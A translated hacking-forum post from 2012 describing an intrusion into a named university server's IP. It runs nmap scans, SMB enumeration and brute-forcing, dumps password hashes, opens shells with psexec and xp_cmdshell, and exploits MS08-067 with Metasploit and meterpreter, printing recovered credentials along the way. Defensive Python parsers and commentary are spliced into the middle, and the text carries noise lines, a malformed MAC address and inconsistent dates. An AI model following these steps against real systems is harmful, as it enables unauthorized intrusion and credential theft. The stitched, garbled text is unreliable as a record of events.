Intruding into Guangxi Normal University with nmap+msf

Posted on 2012-12-4 12:46:42
Guangxi Normal University website http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
% m8 J- N; L. a. ?0 {6 O9 R. Y3 s" x1 p# ^9 i6 @+ E  k- ^9 g' ]$ L
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser    // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
' b+ p- S' R  A( `# ^1 y$ S
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// get the user passwords
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
7 C( }; {$ y7 f9 U8 ~
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
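The pwdump output above is the kind of artifact a defender reviews after an audit or an incident, and it carries more information than the raw hex suggests. An account whose NT hash is printed as "NO PASSWORD" (or equals the NT hash of the empty string) has a blank password; any stored LM hash at all means the NoLMHash policy is not enforced; and an LM hash whose second 16 hex digits are AAD3B435B51404EE (the LM hash of an all-null 7-byte block) belongs to a password of seven characters or fewer, which is exactly what the test account's hash above shows for its six-character password. The following is an added example, not code from the original post: it parses the line format shown above and turns those observations into findings. The sample dump and its hex values are constructed placeholders, not hashes of real accounts.

```python
"""Hardening review of a pwdump-style credential dump (added example; not
code from the original post).  Each line has the form the post shows,
`user:RID => LMHASH:NTHASH`, with `NO PASSWORD*********************`
standing in for a missing hash.  The sample below is constructed: the hex
values are placeholders, not hashes of real accounts."""
import re
from typing import List, NamedTuple, Tuple

EMPTY_LM_HALF = "AAD3B435B51404EE"              # LM hash of an all-null 7-byte block
EMPTY_LM = EMPTY_LM_HALF * 2                     # LM hash of the empty password
EMPTY_NT = "31D6CFE0D16AE931B73C59D7E0C089C0"    # NT hash (MD4) of the empty password
NO_PASSWORD = "NO PASSWORD"                      # pwdump's marker for "no hash stored"

# Constructed sample in the same layout as the smb-pwdump output above.
SAMPLE_DUMP = """\
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| svc_backup:1002 => 0123456789ABCDEFAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF
|_ops:1003 => AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210
"""

# Optional "|" / "|_" Nmap prefix, then user:RID => LM:NT.  The LM field is
# matched lazily so the first ":" after "=> " splits the two hashes even when
# the field is the "NO PASSWORD" marker (which itself contains a space).
LINE_RE = re.compile(
    r"^\|?_?\s*(?P<user>[^:\s]+):(?P<rid>\d+) => (?P<lm>.+?):(?P<nt>.+)$"
)

Finding = Tuple[str, str, str]  # (user, severity, description)


class Account(NamedTuple):
    user: str
    rid: int
    lm: str
    nt: str


def parse_dump(text: str) -> List[Account]:
    """Extract accounts from pwdump-style lines; other lines are ignored."""
    accounts: List[Account] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            accounts.append(Account(m["user"], int(m["rid"]),
                                    m["lm"].strip().upper(), m["nt"].strip().upper()))
    return accounts


def audit(accounts: List[Account]) -> List[Finding]:
    """Rate each account on blank password, LM storage and LM-derived length."""
    findings: List[Finding] = []
    for acct in accounts:
        nt_blank = acct.nt.startswith(NO_PASSWORD) or acct.nt == EMPTY_NT
        lm_stored = not (acct.lm.startswith(NO_PASSWORD) or acct.lm == EMPTY_LM)
        if nt_blank:
            findings.append((acct.user, "CRITICAL", "blank password"))
        if lm_stored:
            findings.append((acct.user, "MEDIUM", "LM hash stored (NoLMHash policy not enforced)"))
            if acct.lm.endswith(EMPTY_LM_HALF):   # second 7-byte block was empty
                findings.append((acct.user, "HIGH", "password is 7 characters or shorter"))
    return findings


def review(text: str) -> List[Finding]:
    return audit(parse_dump(text))


if __name__ == "__main__":
    for user, severity, description in review(SAMPLE_DUMP):
        print(f"{severity:8} {user}: {description}")
```

The "ops" account in the sample stores only the empty-LM constant, which is what a host with NoLMHash enforced (or a password longer than 14 characters) produces, so it raises no LM finding; the checks deliberately say nothing about the NT hash beyond blankness, since nothing further can be read from it without cracking.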

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell
PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"    // log in remotely as sa and run a command
  s8 k% x2 s# ?
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
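Two caveats a reader should take from the scans so far. First, "Cadmus Computer Systems" is the vendor string Nmap prints for the 08:00:27 MAC prefix that VirtualBox assigns to guest NICs, and every scan completes with sub-millisecond latency, so the host being scanned is a local VM rather than a public server. Second, the three host scripts above (smb-enum-shares, smb-brute, smb-check-vulns) are just as useful when a defender runs them against their own Windows hosts: anonymous READ on IPC$, a blank administrator password and an unpatched MS08-067 are each a finding that needs a ticket. The following is an added example, not code from the original post or from Nmap: it parses the normal-output layout shown above (a host script's name on a "| name:" line, its output on "|" and "|_" continuation lines) and turns those three scripts' results into severity-rated findings. The sample report is constructed to mirror the post's output; 192.0.2.10 is a documentation address.

```python
"""Triage of Nmap SMB host-script output (added example; not code from the
original post).  Parses Nmap's normal-output layout and rates the findings of
smb-enum-shares, smb-brute and smb-check-vulns.  The report below is
constructed for the example; 192.0.2.10 is a documentation address."""
import re
from typing import Dict, List, Tuple

# Constructed sample report in the same layout the post's scans show.
SAMPLE_REPORT = """\
Nmap scan report for host1.example.test (192.0.2.10)
Host is up (0.00035s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

Finding = Tuple[str, str, str]  # (host, severity, description)


def parse_report(report: str) -> Dict[str, Dict[str, List[str]]]:
    """Return {host: {script_name: [output lines]}} from Nmap normal output."""
    hosts: Dict[str, Dict[str, List[str]]] = {}
    host = script = None
    in_scripts = False
    for line in report.splitlines():
        m_host = re.match(r"^Nmap scan report for (.+)$", line)
        if m_host:
            target = m_host.group(1)
            m_ip = re.search(r"\(([^()]+)\)$", target)   # "name (ip)" form
            host = m_ip.group(1) if m_ip else target
            hosts[host] = {}
            in_scripts, script = False, None
            continue
        if line.startswith("Host script results:"):
            in_scripts = True
            continue
        if not (in_scripts and host and line.startswith("|")):
            continue
        # A script header is "| name:" with exactly one space; output lines are indented more.
        m_script = re.match(r"^\| ([A-Za-z0-9_-]+):$", line)
        if m_script:
            script = m_script.group(1)
            hosts[host][script] = []
        elif script:
            hosts[host][script].append(line.lstrip("|_").strip())
    return hosts


def assess(hosts: Dict[str, Dict[str, List[str]]]) -> List[Finding]:
    """Map the three scripts' output lines onto severity-rated findings."""
    findings: List[Finding] = []
    for host, scripts in hosts.items():
        share = None
        for body in scripts.get("smb-enum-shares", []):
            if ":" not in body:              # a bare line is a share name
                share = body
                continue
            key, _, value = body.partition(":")
            if key.strip() == "Anonymous access" and value.strip() not in ("", "<none>"):
                findings.append((host, "HIGH", f"share {share} allows anonymous {value.strip()} access"))
        for body in scripts.get("smb-brute", []):
            m = re.match(r"^([^:\s]+):(\S+) => (?:Login was successful|Valid credentials)", body)
            if m:
                user, password = m.groups()
                if password == "<blank>":
                    findings.append((host, "CRITICAL", f"account {user} has a blank password"))
                else:
                    findings.append((host, "HIGH", f"account {user} accepts a guessable password"))
        for body in scripts.get("smb-check-vulns", []):
            m = re.match(r"^([A-Za-z0-9-]+): (.+)$", body)
            if m and m.group(2).startswith("VULNERABLE"):   # "NOT VULNERABLE" is skipped
                findings.append((host, "CRITICAL", f"unpatched {m.group(1)}"))
    return findings


def triage(report: str) -> List[Finding]:
    return assess(parse_report(report))


if __name__ == "__main__":
    for host, severity, description in triage(SAMPLE_REPORT):
        print(f"{host}\t{severity:8} {description}")
```

The parser keys on the indentation Nmap uses (a script name sits one space after the bar, its output lines further in), so it also copes with the "Comment:" and "Type:" lines newer smb-enum-shares versions print, which contain a colon and are therefore never mistaken for share names.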
# b; {+ |, s) F& G: Y
root@bt:~# msfconsole    // use the MS08-067 vulnerability in msf to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
5 ~6 i7 J6 W8 h3 f  B7 V! ?8 b8 D) i5 |